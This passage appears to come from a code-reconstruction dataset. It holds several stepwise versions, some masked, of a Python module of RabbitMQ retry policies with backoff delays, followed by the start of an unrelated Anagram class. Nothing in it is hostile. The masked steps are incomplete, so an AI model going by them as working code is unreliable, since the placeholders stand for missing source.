Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-3": "<mask token>\n\n\nclass BaseRetryPolicy(RetryPolicy):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Unlimited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n unlimited retries.\n\n :attr:`initial_delay`: is the initial/first backoff delay in seconds\n\n :attr:`delay_incremented_by`: is number of seconds the backoff should be incremented\n by after each death\n\n :attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be\n exceeded\n \"\"\"\n\n def __init__(self, consumer, initial_delay, max_delay,\n delay_incremented_by, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + death_count * self.delay_incremented_by\n if delay > self.max_delay:\n delay = self.max_delay\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=envelope\n .payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning('Retry handling message [{}] after {}s; death count: {}'\n .format(envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. 
Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n 
super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-4": "<mask token>\n\n\nclass RetryPolicy(object):\n <mask token>\n\n def __init__(self, **kwargs):\n super(RetryPolicy, self).__init__()\n\n def retry(self, envelope):\n \"\"\"This method is implemented by the subclass.\"\"\"\n raise NotImplementedError()\n\n\nclass BaseRetryPolicy(RetryPolicy):\n \"\"\"Base retry policy class for :class:`.UnlimitedRetriesPolicy` and\n :class:`.LimitedRetriesPolicy`.\n\n It has implementation for geting mesage death count and retry queue creation.\n \"\"\"\n\n def __init__(self, consumer, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param str retry_queue_suffix: Suffix used when creating retry queues. Retry\n queue names are constructed in this form \"queue_name.<suffix>.<delay>\".\n Optional, default to ``retry``\n \"\"\"\n super(BaseRetryPolicy, self).__init__(**kwargs)\n retry_queue_suffix = retry_queue_suffix.strip()\n self.consumer = consumer\n assert len(retry_queue_suffix) > 0\n self.retry_queue_suffix = retry_queue_suffix\n self.min_retry_queue_ttl = 20 * 1000\n\n def set_original_delivery_info_header(self, envelope):\n \"\"\"Save original message delivery infomation in a header.\"\"\"\n if not envelope.get_header('x-original-delivery-info'):\n original_delivery_info = {'consumer_tag': envelope.\n delivery_info.consumer_tag, 'delivery_tag': envelope.\n delivery_info.delivery_tag, 'redelivered': envelope.\n delivery_info.redelivered, 'exchange': envelope.\n delivery_info.exchange, 'routing_key': envelope.\n delivery_info.routing_key}\n envelope.set_header('x-original-delivery-info',\n original_delivery_info)\n\n def get_death_count(self, envelope):\n \"\"\"Return the death count of a message by examining \"x-death\" header.\n\n :param Envelope envelope: Message envelope\n\n :return int: death count\n \"\"\"\n death_header = envelope.get_header('x-death')\n if death_header is None:\n return 0\n count = 0\n for death in death_header:\n if not death['queue'].startswith(self.consumer.queue_name):\n continue\n count += death.get('count', 1)\n return count\n\n def declare_retry_queue(self, delay):\n \"\"\"Declare a retry queue for the provided delay.\n\n Each different delay has a different queue where all retry messages with the\n same delay will be sent to till they expire and get sent back to the original\n queue for handling retry. The queue is declared with a TTL and automatically\n gets deleted. The queue TTL is equal to the provided delay. The retry\n queue's dead letter exchange is (default) direct exchange and the dead letter\n routing key is the original queue name where the messages originally\n came from. 
The messages will be sent back to the original queue when they\n reach their TTL, for handling retry.\n\n The retry queue is redeclared before every a new message is sent to it.\n Redeclaration resets the queue's TTL, preventing it from being destroyed.\n\n\n :param int delay: Retry delay in seconds\n\n :return: retry queue name\n :rtype: str\n \"\"\"\n delay_in_ms = int(delay * 1000)\n retry_queue_name = '{}.{}.{}'.format(self.consumer.queue_name, self\n .retry_queue_suffix, delay_in_ms)\n queue_ttl = delay_in_ms * 2\n if queue_ttl < self.min_retry_queue_ttl:\n queue_ttl = self.min_retry_queue_ttl\n self.consumer.channel.queue_declare(callback=None, queue=\n retry_queue_name, durable=self.consumer.durable, nowait=True,\n arguments={'x-dead-letter-exchange': '',\n 'x-dead-letter-routing-key': self.consumer.queue_name,\n 'x-message-ttl': delay_in_ms, 'x-expires': queue_ttl})\n logger.warning('Retry queue \"{}\" is created/redeclared'.format(\n retry_queue_name))\n return retry_queue_name\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Unlimited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n unlimited retries.\n\n :attr:`initial_delay`: is the initial/first backoff delay in seconds\n\n :attr:`delay_incremented_by`: is number of seconds the backoff should be incremented\n by after each death\n\n :attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be\n exceeded\n \"\"\"\n\n def __init__(self, consumer, initial_delay, max_delay,\n delay_incremented_by, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. 
Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + death_count * self.delay_incremented_by\n if delay > self.max_delay:\n delay = self.max_delay\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=envelope\n .payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning('Retry handling message [{}] after {}s; death count: {}'\n .format(envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. 
Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nNoting is perfect, errors and timeouts may happen, and when such failures happen, the\nconsumer has to decide what to do with that. By default, the consumer would reject the\nenvelope (RabbitMQ message) when a failure happens. However, errors and timeouts\nissues, unless there is a software bug, usually solved with retries. Just like the\nrouting, the consumer doesn't make the retry decision itself, the consumer delegates\nit to a retry policy. Retry policy defines how the retry is performed. Retries\nusually happens with back-offs to avoid worsening the situation by hammering other\nservices with more requests, especially if it was a timeout issue. The consumer can be\nconfigured to use a retry policy by calling :meth:`.Consumer.set_retry_policy`, passing\nan instance of :class:`.RetryPolicy`. When a retry policy is set, the consumer won't\nreject messages, but rather, it send them to the retry policy to deal with the\nsituation by invoking :meth:`.RetryPolicy.retry` method. Based on it's implementation,\nThe retry policy decides how to do retries.\n\nThere are 4 different retry policies available:\n\n1. :class:`.UnlimitedRetriesPolicy`, Unlimited retries policy\n2. :class:`.LimitedRetriesPolicy`, Limited retries policy\n3. :class:`.FixedDelayUnlimitedRetriesPolicy`, Fixed delay unlimited retries policy\n4. :class:`.FixedDelayLimitedRetriesPolicy`, Fixed delay limited retries policy\n\nCustom retry policies can be created by implementing the base class\n:class:`.RetryPolicy`\n\"\"\"\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass RetryPolicy(object):\n \"\"\"Base class for retry policies.\n\n Subclasses MUST implement :meth:`retry` method.\n \"\"\"\n\n def __init__(self, **kwargs):\n # type: (RetryPolicy) -> None\n super(RetryPolicy, self).__init__()\n\n def retry(self, envelope):\n # type: (RetryPolicy, Envelope) -> None\n \"\"\"This method is implemented by the subclass.\"\"\"\n raise NotImplementedError()\n\n\nclass BaseRetryPolicy(RetryPolicy):\n \"\"\"Base retry policy class for :class:`.UnlimitedRetriesPolicy` and\n :class:`.LimitedRetriesPolicy`.\n\n It has implementation for geting mesage death count and retry queue creation.\n \"\"\"\n\n def __init__(self, consumer, retry_queue_suffix='retry', **kwargs):\n # type: (BaseRetryPolicy, Consumer, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param str retry_queue_suffix: Suffix used when creating retry queues. 
Retry\n queue names are constructed in this form \"queue_name.<suffix>.<delay>\".\n Optional, default to ``retry``\n \"\"\"\n super(BaseRetryPolicy, self).__init__(**kwargs)\n retry_queue_suffix = retry_queue_suffix.strip()\n self.consumer = consumer\n assert len(retry_queue_suffix) > 0\n self.retry_queue_suffix = retry_queue_suffix\n # To avoid frequent retry queue create and destroy for low retry delays\n self.min_retry_queue_ttl = 20 * 1000 # 20 seconds\n\n def set_original_delivery_info_header(self, envelope):\n # type: (BaseRetryPolicy, Envelope) -> None\n \"\"\"Save original message delivery infomation in a header.\"\"\"\n if not envelope.get_header('x-original-delivery-info'):\n original_delivery_info = {\n 'consumer_tag': envelope.delivery_info.consumer_tag,\n 'delivery_tag': envelope.delivery_info.delivery_tag,\n 'redelivered': envelope.delivery_info.redelivered,\n 'exchange': envelope.delivery_info.exchange,\n 'routing_key': envelope.delivery_info.routing_key\n }\n envelope.set_header('x-original-delivery-info',\n original_delivery_info)\n\n def get_death_count(self, envelope):\n # type: (BaseRetryPolicy, Envelope) -> int\n \"\"\"Return the death count of a message by examining \"x-death\" header.\n\n :param Envelope envelope: Message envelope\n\n :return int: death count\n \"\"\"\n death_header = envelope.get_header('x-death')\n\n if death_header is None:\n return 0\n\n count = 0\n for death in death_header:\n if not death['queue'].startswith(self.consumer.queue_name):\n continue\n count += death.get('count', 1)\n return count\n\n def declare_retry_queue(self, delay):\n # type: (BaseRetryPolicy, int) -> str\n \"\"\"Declare a retry queue for the provided delay.\n\n Each different delay has a different queue where all retry messages with the\n same delay will be sent to till they expire and get sent back to the original\n queue for handling retry. The queue is declared with a TTL and automatically\n gets deleted. The queue TTL is equal to the provided delay. The retry\n queue's dead letter exchange is (default) direct exchange and the dead letter\n routing key is the original queue name where the messages originally\n came from. 
The messages will be sent back to the original queue when they\n reach their TTL, for handling retry.\n\n The retry queue is redeclared before every a new message is sent to it.\n Redeclaration resets the queue's TTL, preventing it from being destroyed.\n\n\n :param int delay: Retry delay in seconds\n\n :return: retry queue name\n :rtype: str\n \"\"\"\n\n delay_in_ms = int(delay * 1000)\n retry_queue_name = '{}.{}.{}'.format(\n self.consumer.queue_name, self.retry_queue_suffix, delay_in_ms)\n\n # To avoid frequent queue create and destroy for low retry delays\n queue_ttl = delay_in_ms * 2\n if queue_ttl < self.min_retry_queue_ttl:\n queue_ttl = self.min_retry_queue_ttl\n\n self.consumer.channel.queue_declare(\n callback=None,\n queue=retry_queue_name,\n durable=self.consumer.durable,\n nowait=True,\n arguments={\n 'x-dead-letter-exchange': '',\n 'x-dead-letter-routing-key': self.consumer.queue_name,\n 'x-message-ttl': delay_in_ms,\n 'x-expires': queue_ttl\n })\n logger.warning(\n 'Retry queue \"{}\" is created/redeclared'.format(retry_queue_name))\n return retry_queue_name\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Unlimited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n unlimited retries.\n\n :attr:`initial_delay`: is the initial/first backoff delay in seconds\n\n :attr:`delay_incremented_by`: is number of seconds the backoff should be incremented\n by after each death\n\n :attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be\n exceeded\n \"\"\"\n\n def __init__(self,\n consumer,\n initial_delay,\n max_delay,\n delay_incremented_by,\n retry_queue_suffix='retry',\n **kwargs):\n # type: (UnlimitedRetriesPolicy, Consumer, int, int, int, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy,\n self).__init__(consumer, retry_queue_suffix, **kwargs)\n\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n # type: (UnlimitedRetriesPolicy, Envelope) -> None\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. 
Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + (death_count * self.delay_incremented_by)\n\n if delay > self.max_delay:\n delay = self.max_delay\n\n retry_queue_name = self.declare_retry_queue(delay)\n\n # Save original delivery information\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n\n self.consumer.channel.basic_publish(\n exchange='',\n routing_key=retry_queue_name,\n properties=envelope.properties,\n body=envelope.payload)\n\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.format(\n envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self,\n consumer,\n retry_delays,\n retry_queue_suffix='retry',\n **kwargs):\n # type: (LimitedRetriesPolicy, Consumer, Iterable[int], str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer, retry_queue_suffix,\n **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n # type: (LimitedRetriesPolicy, Envelope) -> None\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. 
Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n\n # Save original delivery information\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n\n self.consumer.channel.basic_publish(\n exchange='',\n routing_key=retry_queue_name,\n properties=envelope.properties,\n body=envelope.payload)\n\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.format(\n envelope.message_id, delay, death_count + 1))\n else:\n logger.warning(\n 'Message [{}] exceeded retry limit; death count: {}'.format(\n envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(\n envelope.delivery_tag, requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id))\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n # type: (FixedDelayUnlimitedRetriesPolicy, Consumer, int, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(\n consumer=consumer,\n initial_delay=delay,\n max_delay=delay,\n delay_incremented_by=0,\n retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self,\n consumer,\n delay,\n retries_limit,\n retry_queue_suffix='retry',\n **kwargs):\n # type: (FixedDelayLimitedRetriesPolicy, Consumer, int, int, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(\n consumer=consumer,\n retry_delays=retry_delays,\n retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n",
"step-ids": [
9,
13,
15,
23,
27
]
}
|
[
9,
13,
15,
23,
27
] |
class Anagram(object):
    def __init__(self, word):
        self.word = word
        # Pre-compute the canonical (lower-cased, sorted) form of the subject word.
        self.canonical = self._canonicalize(word)

    def _canonicalize(self, word):
        return sorted(word.lower())

    def _is_anagram(self, word):
        # An anagram must differ from the subject word but share its canonical form.
        return word != self.word and self._canonicalize(word) == self.canonical

    def match(self, words):
